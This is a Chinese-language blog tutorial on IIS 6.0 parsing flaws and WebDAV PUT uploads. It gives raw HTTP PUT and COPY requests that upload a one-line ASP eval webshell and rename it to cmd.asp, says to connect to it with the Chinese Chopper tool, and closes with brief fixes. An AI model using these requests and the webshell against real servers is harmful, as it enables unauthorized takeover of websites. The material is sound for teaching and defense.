IIS6.0解析漏洞

ISS6.0解析漏洞介绍
(1) 当建立*.asa、.asp格式的文件夹时,其目录下的任意文件都将被IIS当作为asp文件解析。
(2) 当文件
.asp;*.jpg IIS6.0同样会将文件当做asp文件解析。
注:微软目前也没有推出补丁,不认为是一个漏洞

ISS6.0 PUT上传原理
WeDAV基于HTTP1.1协议的通信协议使得HTTP支持PUT MOVE COPY DELETE方法。
1.在kali利用nikto探测URL通信协议情况。
在这里插入图片描述
2.探测是否存在PUT漏洞:
OPTIONS /HTTP1.1
Host:www.xxx.com

在这里插入图片描述
3.上传txt文本文件
PUT /*.txt HTTP1.1
Host:www.xxx.com
Content-Length:30

<%eval request(“shezhang”)%>

在这里插入图片描述
4.通过Move或Copy重名
COPY /*.txt HTTP1.1
Host:www.xxx.com
Destination:
http://www.xxx.com/cmd.asp

在这里插入图片描述
IIS6.0 PU上传利用
使用中国菜刀,连接目录中上传的木马文件,操作站点系统中的文件。
在这里插入图片描述
在这里插入图片描述
Iss6.0默认的可执行文件
除了asp还包括这三种:
/test.asa(<%=now()%>)
/test.cer
/test.cdx
在这里插入图片描述
Iss6.0解析配置
在这里插入图片描述

IIS6.0的修复方案
1.目前尚无微软官方的补丁,可以通过编写正则,阻止上传xx.asp;.jpg类型的文件名

2.做好权限设置,限制用户创建文件夹

  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

weixin_42299610

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值